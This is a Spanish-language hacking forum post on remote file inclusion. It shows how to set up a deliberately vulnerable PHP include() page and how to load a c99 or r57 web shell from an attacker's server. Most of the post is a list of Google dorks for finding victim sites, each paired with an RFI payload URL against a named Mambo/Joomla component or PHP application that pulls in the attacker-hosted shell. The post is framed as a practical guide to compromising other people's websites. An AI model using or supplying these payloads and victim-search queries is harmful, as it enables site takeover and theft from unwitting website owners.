Posiblemente las técnicas del RFI ya han sido posteadas en este foro, sin embargo, voy a agregar
algunos datos más el video, de forma que no solamente se vera la teoría sino también la practica.
En el video también se podrá apreciar algunos de los funcionamientos de la shell r57.
-------------------------------------------------------------------------------
-------------------PONIENDO TU PC VULNERABLE A RFI--------------------------
-------------------------------------------------------------------------------
-Desde el servidor que vamos a poner vulnerable:
1. En el php.ini de tu servidor web ve que tengas activas (en On) estas funciones:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On
Si no las tienes en On, ponlas y reinicias la computadora para que los cambios
surjan efecto.
2. Crea un archivo de nombre index.php y le colocas el siguiente código:
<?php
include($_GET['page']); //esto incluye cualquier link que se especifique en page
?>
3. Crea un archivo de nombre archivo.htm y le colocas el siguiente código:
<center>
<b>Hola Mundo</b>
</center>
4. Coloca este link:
http://www.tuweb.com/index.php?page=archivo.htm y veras el mensaje "Hola mundo"
5. Coloca este link:
http://www.tuweb.com/index.php?page=http://www.google.com y veras la web de google
-Desde el servidor del atacante:
1. Colocar este link:
http://www.tuweb.com/index.php?page=http://www.webatacante.com/r57.txt y veras la shell r57.txt
-----------------------------------------------------------------------------
------------------------------ATAQUES--------------------------------------
-----------------------------------------------------------------------------
------------------------RFI en include page----------------------------------
Como tu eres el atacante, coloca la shell c99.txt o r57.txt en tu servidor
web (ej: IIS, Apache...), de forma que quede así:
www.tuweb.com/c99.txt2. Para buscar una victima ve a google y teclea: allinurl:index.php?page=
3. Una vez que seleccionas la web borra todo hasta el ultimo / y le colocas
la siguiente línea: index.php?page=http://www.tuweb.net/c99.txt de forma
que te quedaría asi:
www.victima.com/index.php?page=http://www.tuweb.com/c99.txtmás ataques:
en google colocar: powered : war v1.5.0
RFI: admin/admin.php?vwar_root=http://www.tuweb.com/c99.txt
en google colocar: powered by Eqdkp 1.3.0
RFI: /includes/dbal.php?eqdkp_root_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_htmlarea3_xtd-c"
RFI: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_sitemap"
RFI: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_pccookbook"
RFI: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:index.php?option=com_extcalendar
RFI: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_forum"
RFI: /components/com_forum/download.php?phpbb_root_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_performs"
RFI: components/com_performs/performs.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_comprofiler"
RFI: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_zoom"
RFI: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_serverstat"
RFI: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"minibb"
RFI: components/minibb/index.php?absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_fm"
RFI: components/com_fm/fm.install.php?lm_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_flyspray"
RFI: /components/com_flyspray/startdown.php?file=http://www.tuweb.com/c99.txt
en google colocar: inurl:index.php?option=com_simpleboard
RFI: /components/com_simpleboard/file_upload.php?sbp=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_hashcash"
RFI: /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_smf"
RFI: /components/com_smf/smf.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_pollxt"
RFI: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_loudmounth"
RFI: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_artlinks"
RFI: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_galleria"
RFI: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_akocomment"
RFI: /akocomments.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_videodb"
RFI: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_securityimages"
RFI: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_admin"
RFI: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:index.php?option=com_pcchess
RFI: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_multibanners"
RFI: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_a6mambohelpdesk"
RFI: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_colophon"
RFI: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_mgm"
RFI: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_mambatstaff"
RFI: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
en google colocar: inurl:"com_kochsuite"
RFI: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt
Notas:
-Si no tienes una web con el c99.txt o r57.txt puedes usar la web de otra
persona que tenga esa shell.
-Si tienes una shell como c99.txt o r57.txt y quieres ver como se ve desde tu
servidor, guárdalo como c99.php y lo ejecutas desde
www.tuweb.com/c99.php
Autor